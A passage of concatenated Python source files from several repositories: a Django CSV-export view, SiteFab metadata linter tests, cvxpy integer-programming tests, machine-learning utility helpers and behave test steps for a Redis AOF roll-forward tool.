    alias = getattr(settings, "DASHBOARD_DB_ALIAS", "dashboard")
    # Decide on filename
    sql_hash = hashlib.sha256(sql.encode("utf-8")).hexdigest()[:6]
    filename = non_alpha_re.sub("-", sql.lower()[:30]) + sql_hash
    filename_plus_ext = filename + "." + format
    connection = connections[alias]
    connection.cursor()  # To initialize connection
    # Named cursor => PostgreSQL server-side cursor, enabling fetchmany batches.
    cursor = connection.create_cursor(name="c" + filename.replace("-", "_"))
    csvfile = StringIO()
    csvwriter = csv.writer(
        csvfile,
        dialect={
            "csv": csv.excel,
            "tsv": csv.excel_tab,
        }[format],
    )

    def read_and_flush():
        # Drain whatever the csv writer has buffered so far and reset it.
        csvfile.seek(0)
        data = csvfile.read()
        csvfile.seek(0)
        csvfile.truncate()
        return data

    def rows():
        # Generator feeding StreamingHttpResponse; the finally clause makes
        # sure the server-side cursor is closed even on client disconnect.
        try:
            cursor.execute(sql, parameter_values)
            done_header = False
            while True:
                records = cursor.fetchmany(size=2000)
                if not done_header:
                    csvwriter.writerow([r.name for r in cursor.description])
                    yield read_and_flush()
                    done_header = True
                if not records:
                    break
                for record in records:
                    csvwriter.writerow(record)
                yield read_and_flush()
        finally:
            cursor.close()

    response = StreamingHttpResponse(
        rows(),
        content_type={
            "csv": "text/csv",
            "tsv": "text/tab-separated-values",
        }[format],
    )
    response["Content-Disposition"] = 'attachment; filename="' + filename_plus_ext + '"'
    return response
|
<reponame>ebursztein/SiteFab
# encoding: utf-8
from .utils import get_linter_errors_list
def test_e104_triggered(sitefab, empty_post):
    # E104: a list meta field containing duplicate entries is flagged.
    empty_post.meta.mylist = ["test", "test"]
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E104" in error_list


def test_e104_not_triggered(sitefab, empty_post):
    empty_post.meta.mylist = ["test"]
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E104" not in error_list


def test_e105_triggered(sitefab, empty_post):
    # E105: the category must not also appear in the tags list.
    empty_post.meta.tags = ["tag1", "category", "tag2"]
    empty_post.meta.category = "category"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E105" in error_list


def test_e105_not_triggered(sitefab, empty_post):
    empty_post.meta.tags = ["tag1", "tag4", "tag2"]
    empty_post.meta.category = "category"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E105" not in error_list


def test_e106_triggered(sitefab, empty_post):
    # E106: consecutive spaces in the title are flagged.
    empty_post.meta.title = "title with  extra space"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E106" in error_list


def test_e106_not_triggered(sitefab, empty_post):
    empty_post.meta.title = "title with no extra space"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E106" not in error_list


def test_e107_triggered(sitefab, empty_post):
    # E107: authors must be a list, not a plain string.
    empty_post.meta.authors = "this is not a list"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E107" in error_list


def test_e107_not_triggered(sitefab, empty_post):
    empty_post.meta.authors = ['<NAME>', '<NAME>']
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E107" not in error_list


def test_e108_triggered(sitefab, empty_post):
    # E108: author entries without a comma separator are flagged.
    empty_post.meta.authors = ['<NAME>', 'No Commas']
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E108" in error_list


def test_e108_not_triggered(sitefab, empty_post):
    empty_post.meta.authors = ['<NAME>',
                               '<NAME>', '<NAME>']
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E108" not in error_list


def test_e109_triggered(sitefab, empty_post):
    # E109: author name parts must be capitalized.
    empty_post.meta.authors = ['<NAME>', 'not, Capitalized']
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E109" in error_list


def test_e109_not_triggered(sitefab, empty_post):
    empty_post.meta.authors = ['<NAME>', 'Celine, Bursztein']
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E109" not in error_list


def test_e110_triggered(sitefab, empty_post):
    # E110: the category must be lowercase.
    empty_post.meta.category = "not Lower"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E110" in error_list


def test_e110_not_triggered(sitefab, empty_post):
    empty_post.meta.category = "lower"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E110" not in error_list


def test_e112_triggered(sitefab, empty_post):
    # E112: the files meta field must be a dict, not a string.
    empty_post.meta.files = "not Lower"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E112" in error_list


def test_e112_not_triggered(sitefab, empty_post):
    empty_post.meta.files = {"pdf": "/test/test.pdf"}
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E112" not in error_list


def test_e113_triggered(sitefab, empty_post):
    # E113: the banner must be a string; every non-string value triggers it.
    values = [53, ['bla'], {'bla': 'oups'}, None]
    for value in values:
        empty_post.meta.banner = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E113" in error_list


def test_e113_not_triggered(sitefab, empty_post):
    values = ["test", u"test", "", u""]
    for value in values:
        empty_post.meta.banner = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E113" not in error_list
def test_e114_triggered(sitefab, empty_post):
    # Each value is an invalid banner URL that must raise E114.
    # Fix: a missing comma after "https://" caused implicit string
    # concatenation ("https://hTTps://elie.net"), silently dropping two of
    # the intended test cases.
    test_values = [
        "http://",
        "https://",  # empty
        "hTTps://elie.net",  # caps
        "https://elie.net/ test.html"  # space
    ]
    for value in test_values:
        empty_post.meta.banner = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E114" in error_list
def test_e114_not_triggered(sitefab, empty_post):
    # Valid banner URLs/paths that must NOT raise E114.
    # Fix: missing commas caused "/cat/file.pdf" and "/cat/file.pdf?a=2" to
    # concatenate into one bogus value, so those cases were never tested.
    test_values = [
        "http://www.elie.net",
        "https://www.elie.net",
        "https://www.elie.net/test.html",
        "https://www.elie.net/test/test.html",
        "https://www.elie.net/test/test",
        "https://www.elie.net/test/test.pdf",
        "https://www.elie.net/test/test.pdf?a=42",
        "/cat/file",
        "cat/file",
        "/cat/file.pdf",
        "/cat/file.pdf?a=2"
    ]
    for value in test_values:
        empty_post.meta.banner = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E114" not in error_list
def test_e115_triggered(sitefab, empty_post):
    # E115: banner paths containing spaces are flagged.
    test_values = [
        "file .pdf",
    ]
    for value in test_values:
        empty_post.meta.banner = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E115" in error_list


def test_e115_not_triggered(sitefab, empty_post):
    test_values = [
        "file.pdf",
        "/file.pdf",
        "/files/file.pdf",
        "/file/file-test.pdf",
        "/file/file-test02.jpeg",
    ]
    for value in test_values:
        empty_post.meta.banner = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E115" not in error_list


def test_e116_triggered(sitefab, empty_post):
    # E116: a missing (None) title is flagged.
    empty_post.meta.title = None
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E116" in error_list


def test_e116_not_triggered(sitefab, empty_post):
    empty_post.meta.title = "this is my title"
    results = sitefab.linter.lint(empty_post, "", sitefab)
    error_list = get_linter_errors_list(results)
    assert "E116" not in error_list


def test_e117_triggered(sitefab, empty_post):
    # E117: permanent_url must be a string; non-string values are flagged.
    values = [53, ['bla'], {'bla': 'oups'}, None]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E117" in error_list
def test_e117_not_triggered(sitefab, empty_post):
    # Valid (string) permanent_url values must not raise E117.
    # Fix: `u"test" u""` was an implicit concatenation — the empty-unicode
    # case was never actually exercised.
    values = ["test", u"test", u"", ""]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E117" not in error_list
def test_e118_triggered(sitefab, empty_post):
    # Malformed permanent URLs that must raise E118.
    # Fix: a missing comma after "https://" concatenated it with the next
    # literal, silently dropping two intended test cases.
    values = [
        "http://",
        "https://",  # empty
        "hTTps://elie.net",  # caps
        "https://elie.net/ test.html"  # space
    ]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E118" in error_list
def test_e118_not_triggered(sitefab, empty_post):
    # Well-formed permanent URLs that must NOT raise E118.
    # Fix: missing commas merged "/cat/file?a=5" + "/cat/file.pdf" and
    # "" was concatenated away, so those cases were never tested.
    test_values = [
        "/cat/file",
        "/cat/file?a=5",
        "/cat/file.pdf",
        ""
    ]
    for value in test_values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E118" not in error_list
def test_e119_triggered(sitefab, empty_post):
    # E119: permanent_url must be an absolute path (leading "/").
    values = ["notabsolute", "not/absolute/not"]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E119" in error_list


def test_e119_not_triggered(sitefab, empty_post):
    values = ["/absolute", "/absolute/not"]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E119" not in error_list
def test_e120_triggered(sitefab, empty_post):
    # E120: for a "blog_post" template the permanent_url must use the
    # expected prefix; these values should be flagged.
    # Fix: removed leftover debug code (`import pprint` /
    # `pprint.pprint(empty_post)`) that spammed the test output.
    empty_post.meta.template = "blog_post"
    values = ["wrong", "wrong/again"]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E120" in error_list
def test_e120_not_triggered(sitefab, empty_post):
    # Blog-post URLs with the expected "/blog/" prefix must not raise E120.
    empty_post.meta.template = "blog_post"
    values = ["/blog/ok", "/blog/ok/as", "/blog/ok/as.well"]
    for value in values:
        empty_post.meta.permanent_url = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E120" not in error_list


def test_e121_triggered(sitefab, empty_post):
    # E121: files dict keys must be one of the known types (slides/paper/video).
    values = [{"not a valid type": "myslide"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E121" in error_list


def test_e121_not_triggered(sitefab, empty_post):
    values = [{"slides": "myslide"}, {
        "paper": "mypaper"}, {"video": "myvideo"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E121" not in error_list


def test_e122_triggered(sitefab, empty_post):
    # E122: file values must look like valid file paths.
    values = [{"not a valid type": "not a valid file"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E122" in error_list


def test_e122_not_triggered(sitefab, empty_post):
    values = [{"slides": "/myslide.pdf"}, {"video": "/files/myvideo.mp4"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E122" not in error_list


def test_e123_triggered(sitefab, empty_post):
    # E123: file paths must be absolute (leading "/").
    values = [{"not a valid type": "/baprefix",
               "video": "files/almostcorrect"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E123" in error_list


def test_e123_not_triggered(sitefab, empty_post):
    values = [{"slides": "/files/myslide.pdf"},
              {"video": "/files/myvideo.mp4"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E123" not in error_list


def test_e124_triggered(sitefab, empty_post):
    # E124: file URLs must be well-formed (note the deliberate "htt://" typo).
    values = [{"not a valid type": "/nosuffix.pdf",
               "video": "files/almostcorrect.pdf"},
              {"video": "htt://whateverr/files/myvideo.mp4"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E124" in error_list


def test_e124_not_triggered(sitefab, empty_post):
    values = [{"slides": "/files/myfiles-slides.pdf"},
              {"video": "https://whateverr/files/myvideo.mp4"}]
    for value in values:
        empty_post.meta.files = value
        results = sitefab.linter.lint(empty_post, "", sitefab)
        error_list = get_linter_errors_list(results)
        assert "E124" not in error_list
|
<reponame>gabrielhartmann/cvxpy
"""
Copyright 2013 <NAME>, <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import cvxpy as cvx
import numpy as np
import cvxpy.settings as s
from cvxpy.tests.base_test import BaseTest
from cvxpy.reductions.solvers.defines \
import INSTALLED_SOLVERS
MIP_SOLVERS = [cvx.ECOS_BB, cvx.GUROBI, cvx.MOSEK]
class TestMIPVariable(BaseTest):
    """ Unit tests for the expressions/shape module. """

    def setUp(self):
        # Scalar and matrix boolean/integer variables reused across tests.
        self.x_bool = cvx.Variable(boolean=True)
        self.y_int = cvx.Variable(integer=True)
        self.A_bool = cvx.Variable((3, 2), boolean=True)
        self.B_int = cvx.Variable((2, 3), integer=True)
        # Check for all installed QP solvers
        self.solvers = [x for x in MIP_SOLVERS if x in INSTALLED_SOLVERS]

    def test_mip_consistency(self):
        """Test that MIP problems are deterministic.
        """
        data_recs = []
        result_recs = []
        for i in range(5):
            obj = cvx.Minimize(cvx.square(self.y_int - 0.2))
            p = cvx.Problem(obj, [self.A_bool == 0, self.x_bool == self.B_int])
            data_recs.append(p.get_problem_data(cvx.ECOS_BB))
            # result_recs.append( p.solve() )
        # Check that problem data and result is always the same.
        for i in range(1, 5):
            # self.assertEqual(result_recs[0], result_recs[i])
            for key in ["c", "A", "b", "G", "h",
                        "bool_vars_idx", "int_vars_idx"]:
                lh_item = data_recs[0][0][key]
                rh_item = data_recs[i][0][key]
                if key in ["A", "G"]:
                    # Sparse matrices must be densified before comparison.
                    lh_item = lh_item.todense()
                    rh_item = rh_item.todense()
                self.assertItemsAlmostEqual(lh_item, rh_item)

    # def test_mip_print(self):
    #     """Test to string methods for Bool/Int vars.
    #     """
    #     self.assertEqual(repr(self.x_bool), "Bool(1, 1)")
    #     self.assertEqual(repr(self.B_int), "Int(2, 3)")

    def test_all_solvers(self):
        # Run the whole battery against every installed MIP-capable solver.
        for solver in self.solvers:
            self.bool_prob(solver)
            self.int_prob(solver)
            self.bool_socp(solver)
            self.int_socp(solver)

    def bool_prob(self, solver):
        # Bool in objective.
        obj = cvx.Minimize(cvx.square(self.x_bool - 0.2))
        p = cvx.Problem(obj, [])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0.04)
        self.assertAlmostEqual(self.x_bool.value, 0)
        # Bool in constraint.
        t = cvx.Variable()
        obj = cvx.Minimize(t)
        p = cvx.Problem(obj, [cvx.square(self.x_bool) <= t])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0)
        self.assertAlmostEqual(self.x_bool.value, 0, places=4)
        # Matrix Bool in objective.
        C = np.array([[0, 1, 0], [1, 1, 1]]).T
        obj = cvx.Minimize(cvx.sum_squares(self.A_bool - C))
        p = cvx.Problem(obj, [])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0)
        self.assertItemsAlmostEqual(self.A_bool.value, C, places=4)
        # Matrix Bool in constraint.
        t = cvx.Variable()
        obj = cvx.Minimize(t)
        p = cvx.Problem(obj, [cvx.sum_squares(self.A_bool - C) <= t])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0)
        self.assertItemsAlmostEqual(self.A_bool.value, C, places=4)

    def int_prob(self, solver):
        # Int in objective.
        obj = cvx.Minimize(cvx.square(self.y_int - 0.2))
        p = cvx.Problem(obj, [])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0.04)
        self.assertAlmostEqual(self.y_int.value, 0)
        # Infeasible integer problem
        obj = cvx.Minimize(0)
        p = cvx.Problem(obj, [self.y_int == 0.5])
        result = p.solve(solver=solver)  # NOTE(review): result unused; only status checked
        self.assertEqual(p.status in s.INF_OR_UNB, True)

    def int_socp(self, solver):
        # Int in objective.
        t = cvx.Variable()
        obj = cvx.Minimize(t)
        p = cvx.Problem(obj, [cvx.square(self.y_int - 0.2) <= t])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0.04)
        self.assertAlmostEqual(self.y_int.value, 0)

    def bool_socp(self, solver):
        # Int in objective.
        t = cvx.Variable()
        obj = cvx.Minimize(t)
        p = cvx.Problem(obj, [cvx.square(self.x_bool - 0.2) <= t])
        result = p.solve(solver=solver)
        self.assertAlmostEqual(result, 0.04)
        self.assertAlmostEqual(self.x_bool.value, 0)
|
from os import listdir, path
from glob import glob
from datetime import datetime
from subprocess import Popen, PIPE, run
from multiprocessing import cpu_count
from pathlib import Path
from typing import Dict
import pandas as pd
import torch
import logging
HOME_DIR = str(Path.home())  # user's home directory as a plain string
# Timestamp taken once at import time; used to suffix log file names.
# '%e' is a space-padded day-of-month (glibc extension), hence the lstrip().
INIT_TIME = datetime.now().strftime('%e-%m-%y_%H-%M-%S').lstrip()
def init_logger(name=None, path=None, screen=True):
    """Build and return an INFO-level logger.

    When *path* is given, the directory is created and a file handler writes
    to ``{path}/{name}-{INIT_TIME}.log``; when *screen* is true, a console
    handler is attached as well.  *name* defaults to this module's name.
    """
    if name is None:
        name = __name__
    logger = logging.getLogger(name)
    logger.setLevel(logging.INFO)
    fmt = logging.Formatter('{asctime} - {message}', datefmt="%H:%M:%S", style="{")
    handlers = []
    if path:
        Path(path).mkdir(parents=True, exist_ok=True)
        handlers.append(logging.FileHandler(f"{path}/{name}-{INIT_TIME}.log"))
    if screen:
        handlers.append(logging.StreamHandler())
    for handler in handlers:
        handler.setFormatter(fmt)
        logger.addHandler(handler)
    return logger
def get_free_gpu():
    """Return a torch.device for the first idle GPU, or the CPU.

    Parses ``nvidia-smi -q -d PIDS``: each GPU section has a "Processes"
    line that ends in "None" when no process is running on that GPU.
    Falls back to the CPU when CUDA is unavailable or every GPU is busy.
    """
    if torch.cuda.is_available():
        # Filter the "Processes" lines in Python instead of piping through an
        # external `grep`: portable, and it avoids leaving the first Popen
        # child unreaped (the original never waited on it).
        smi = run(["nvidia-smi", "-q", "-d", "PIDS"], stdout=PIPE, text=True)
        process_lines = [line for line in smi.stdout.strip().split("\n")
                         if "Processes" in line]
        for i, line in enumerate(process_lines):
            if line.endswith("None"):
                print(f"Found Free GPU ID: {i}")
                cuda_device = f"cuda:{i}"
                torch.cuda.set_device(cuda_device)
                return torch.device(cuda_device)
    print("WARN - No Free GPU found! Running on CPU instead...")
    return torch.device("cpu")
def count_num_cpu_gpu():
    """Return ``(num_cpu_cores, num_gpu_cores)`` for worker sizing.

    With GPUs present, logical CPUs are split across GPUs and halved
    (hyperthreads), minus one headroom core; without GPUs, simply half
    the logical CPUs minus one.
    """
    gpu_total = torch.cuda.device_count() if torch.cuda.is_available() else 0
    # (c // g) // 2 == c // (2 * g) for positive integers, so a single
    # floor division covers both branches.
    divisor = 2 * gpu_total if gpu_total else 2
    cpu_total = cpu_count() // divisor - 1
    return cpu_total, gpu_total
class StreamToLogger:
    """
    Fake file-like stream object that redirects writes to a logger instance.
    written by: <NAME>
    https://www.electricmonk.nl/log/2011/08/14/redirect-stdout-and-stderr-to-a-logger-in-python/
    """
    def __init__(self, logger, log_level=logging.INFO):
        self.logger = logger        # destination logger for redirected output
        self.log_level = log_level  # level used for every redirected line
        self.linebuf = ''           # kept for file-object compatibility; unused

    def write(self, buf):
        # Emit each non-empty line of the written text as one log record.
        for line in buf.rstrip().splitlines():
            self.logger.log(self.log_level, line.rstrip())

    def flush(self):
        # Added for file-like API compatibility: print(..., flush=True) and
        # interpreter shutdown call flush() on sys.stdout/sys.stderr, which
        # raised AttributeError before.  Logging handlers flush themselves,
        # so this is a no-op.
        pass
def save_predictions(folder, sample_idx_list, predictions_list, true_list, correct_list, class_probs, name):
    """Write per-sample predictions to ``{folder}/{name}-predictions.csv``.

    One row per sample (indexed and sorted by ``sample_index``) with the
    predicted label, true label, correctness flag, and one probability
    column per class (``class_{i}_prob``).
    """
    columns = {
        "sample_index": sample_idx_list,
        "prediction": predictions_list,
        "true": true_list,
        "correct": correct_list,
    }
    for class_idx, probs in enumerate(class_probs):
        columns[f"class_{class_idx}_prob"] = probs
    frame = pd.DataFrame.from_dict(columns).set_index("sample_index").sort_index()
    frame.to_csv(f"{folder}/{name}-predictions.csv")
class GoogleDriveHandler:
    """Minimal wrapper around the `drive` Go CLI, supporting pull/push of
    files under a locally synced Google Drive root."""

    def __init__(self,
                 local_root: str = f"{HOME_DIR}/GoogleDrive",
                 drive_binary: str = f"{HOME_DIR}/bin/go/packages/bin/drive",
                 default_timeout: int = 600):
        # Defaults are part of the public interface; keep them unchanged.
        self.local_root = local_root
        self.drive_binary = drive_binary
        self.default_args = ["-no-prompt"]
        self.default_timeout = default_timeout

    def _execute_drive_cmd(self, subcommand: str, path: str, cmd_args: list):
        """Run ``drive <subcommand> ... <path>``; return (code, stdout, stderr)."""
        if subcommand not in ("pull", "push"):
            raise ValueError("Only pull and push commands are currently supported")
        full_cmd = [self.drive_binary, subcommand, *self.default_args, *cmd_args, path]
        completed = run(full_cmd, capture_output=True, text=True,
                        timeout=self.default_timeout, cwd=HOME_DIR)
        return completed.returncode, completed.stdout, completed.stderr

    def push_files(self, path: str, cmd_args: list = []):
        """Push *path* to Drive; always return a human-readable status message."""
        try:
            code, out, err = self._execute_drive_cmd("push", path, ["-files"] + cmd_args)
        except Exception as e:
            return f"ERROR: {e}\nFailed to push results to Google Drive: {path}"
        if code == 0:
            return f"Successfully pushed results to Google Drive: {path}"
        return f"Failed to push results to Google Drive: {path}\nExit Code: {code}\nSTDOUT: {out}\nSTDERR: {err}"

    def pull_files(self, path: str, cmd_args: list = []):
        """Pull *path* from Drive; return the raw (code, stdout, stderr) tuple."""
        return self._execute_drive_cmd("pull", path, ["-files"] + cmd_args)
def get_checkpoint_file(ckpt_dir: str):
    """Return the alphabetically-first ``*.ckpt`` path in *ckpt_dir*,
    or None when the directory contains no checkpoint file."""
    for file in sorted(listdir(ckpt_dir)):
        if file.endswith(".ckpt"):
            return f"{ckpt_dir}/{file}"
    return None
def find_latest_model_checkpoint(models_dir: str):
    """Return the newest checkpoint matching the *models_dir* glob pattern.

    Candidate version directories are visited newest-first (by creation
    time); the first whose ``checkpoints`` subfolder holds a ``*.ckpt``
    wins.  Raises FileNotFoundError when no candidate has a checkpoint.

    Bug fix: the previous ``while not model_ckpt`` loop re-globbed on every
    pass and always popped the same newest entry, so it spun forever
    whenever that entry had no checkpoint file.  Each candidate is now
    visited exactly once, falling back to older versions.
    """
    model_versions = sorted(glob(models_dir), key=path.getctime)
    for latest_model in reversed(model_versions):
        model_ckpt_dir = f"{latest_model}/checkpoints"
        if not path.isdir(model_ckpt_dir):
            continue  # version without a checkpoints folder: skip, don't crash
        model_ckpt = get_checkpoint_file(model_ckpt_dir)
        if model_ckpt:
            return model_ckpt
    raise FileNotFoundError(f"Couldn't find a model checkpoint in {models_dir}")
def print_final_metrics(name: str, metrics: Dict, logger=None):
    """Report final metric values, four decimal places each.

    Lines go to *logger* at INFO level when one is given, otherwise to
    stdout, followed by a trailing blank separator either way.
    """
    lines = [f"{name} Metrics:"]
    lines.extend(f"{metric}: {val:.4f}" for metric, val in metrics.items())
    if logger:
        for line in lines:
            logger.info(line)
        logger.info("\n")
    else:
        for line in lines:
            print(line)
        print()
|
import os
import sys
import time
import redis
import random
import subprocess
from redisrollforward.redis_aof_read import redis_aof_read
from redisrollforward.redis_aof_funnel import redis_aof_funnel
from behave import given, when, then, step # a@UnresolvedImport @UnusedImport
from datetime import datetime
# Get environment variables
try:
    bDeleteTestData = os.getenv('DeleteTestData') == 'True'
except:
    # NOTE(review): os.getenv never raises, so this fallback looks dead —
    # confirm before removing.  Default is to delete test data.
    bDeleteTestData = True
# Globals
cAmberEclipseWorkspace = os.getenv('AmberEclipseWorkspace')
if sys.platform == 'win32':
    # On Windows the redis binary is bundled inside the Eclipse workspace.
    cRedisStartupCommand = os.path.join(cAmberEclipseWorkspace, '.metadata/.plugins/org.eclipse.debug.core/.launches/tools/Redis-Msdn-2.6_alpha_x64/redis-server.exe')
else:
    # Elsewhere, assume redis-server is on PATH.
    cRedisStartupCommand = 'redis-server'
# Directory layout for the behave test fixtures.
cTestdir = os.path.join(cAmberEclipseWorkspace, 'py-redisrollforward/features/steps')
cTestConfigdir = os.path.join(cTestdir, 'config')
cTestdataDir = os.path.join(cTestdir, 'testdata')
cRedisSrcConfig = os.path.join(cTestConfigdir, 'redis.conf')
cRedisDstConfig = os.path.join(cTestdataDir, 'redis.conf')
# Backup dir is keyed by host IP and today's date.
cAofBackupDir = os.path.join(cTestdataDir, '127.0.0.1', datetime.now().strftime('%Y-%m-%d'))
# Helper functions
def ScrambleString(cIP):
    """Return a random permutation of the characters of *cIP*."""
    tShuffled = random.sample(cIP, len(cIP))
    return ''.join(tShuffled)
def RemoveDirWithContents(cDirIP):
    """Recursively delete *cDirIP*: files first, then the now-empty
    directories bottom-up, and finally the root itself."""
    for cRoot, tDirs, tFiles in os.walk(cDirIP, topdown=False):
        for cPath in (os.path.join(cRoot, cName) for cName in tFiles):
            os.remove(cPath)
        for cPath in (os.path.join(cRoot, cName) for cName in tDirs):
            os.rmdir(cPath)
    os.rmdir(cDirIP)
def ConfigCopyAndUpdate(cRedisSrcConfigIP, cRedisDstConfigIP, cTestdataDirIP):
    '''Copy the original redis config to the workdir, rewriting the logfile,
    pidfile and dir properties so they point into cTestdataDirIP.

    Bug fix: the files were opened in binary mode ('rb'/'wb') while every
    comparison and replacement used str objects; under Python 3 the
    str-vs-bytes mismatch meant startswith('#') raised TypeError and no
    property line was ever rewritten.  Text mode fixes both.
    '''
    with open(cRedisSrcConfigIP, 'r') as oRead, open(cRedisDstConfigIP, 'w') as oWrite:
        for cLine in oRead:
            # Only non-empty, non-comment lines are candidate property lines.
            if len(cLine.rstrip()) > 0 and not cLine.startswith('#'):
                tLine = cLine.split()
                cPropertyName = tLine[0]
                if cPropertyName == 'logfile':
                    cLine = 'logfile %s\n' % os.path.join(cTestdataDirIP, 'redis_6379.log')
                elif cPropertyName == 'pidfile':
                    cLine = 'pidfile %s\n' % os.path.join(cTestdataDirIP, 'redis_6379.pid')
                elif cPropertyName == 'dir':
                    cLine = 'dir %s\n' % cTestdataDirIP
            # All lines (rewritten or not, including comments) are copied over.
            oWrite.write(cLine)
def Teardown(context):
    """Shut down redis, the aof funnel server and the aof read client, then
    optionally wipe the testdata dir (controlled by DeleteTestData env var)."""
    context.oRedisClient.shutdown()
    # NOTE(review): touching this .trg file presumably signals the read client
    # that the redis connection is gone; the pid keeps the name unique per
    # test run — confirm against redis_aof_read.
    open(os.path.join(cTestdataDir, 'clientdisconnect_%s.trg' % os.getpid()), 'wb').close()
    context.oRedisAofFunnel.ServerStop()
    time.sleep(1.0)
    context.oRedisAofRead.ClientStop()
    # Close log handlers so the log files under testdata can be deleted below.
    context.oRedisAofRead.oLog.handlers[0].close()
    context.oRedisAofFunnel.oLog.handlers[0].close()
    # Stopping aof_read and aof_funnel takes some time, so wait
    time.sleep(1.0)
    if bDeleteTestData:
        RemoveDirWithContents(cTestdataDir)
# Feature steps
@given(u'there is a redis instance with AOF persistence that logs every write operation received by the server')
def StartRedisDb(context):
    """behave step: start a fresh redis server on a clean testdata dir."""
    # Shutdown the default redis db if running
    # NOTE(review): StrictRedis.shutdown() raises when nothing listens on
    # 45321 — presumably a server is always left running between scenarios;
    # confirm.
    context.oRedisClient = redis.StrictRedis('localhost', 45321)
    context.oRedisClient.shutdown()
    time.sleep(1.0)
    # First reset testdata dir
    if os.path.isdir(cTestdataDir):
        RemoveDirWithContents(cTestdataDir)
    os.makedirs(cTestdataDir)
    # Redis Db copy and prepare
    ConfigCopyAndUpdate(cRedisSrcConfig, cRedisDstConfig, cTestdataDir)
    subprocess.Popen([cRedisStartupCommand, cRedisDstConfig])
    # Wait a short moment for the redis instance to boot
    time.sleep(0.5)
@given(u'there is a running redis_aof_read client')
def StartRedisAofRead(context):
    # behave step: start the aof_read client from its test JSON config.
    context.oRedisAofRead = redis_aof_read(os.path.join(cTestConfigdir, 'test_aof_read.json'), bVerboseIP = True)
    context.oRedisAofRead.ClientStart()
@given(u'there is a running redis_aof_funnel server')
def StartRedisAofFunnel(context):
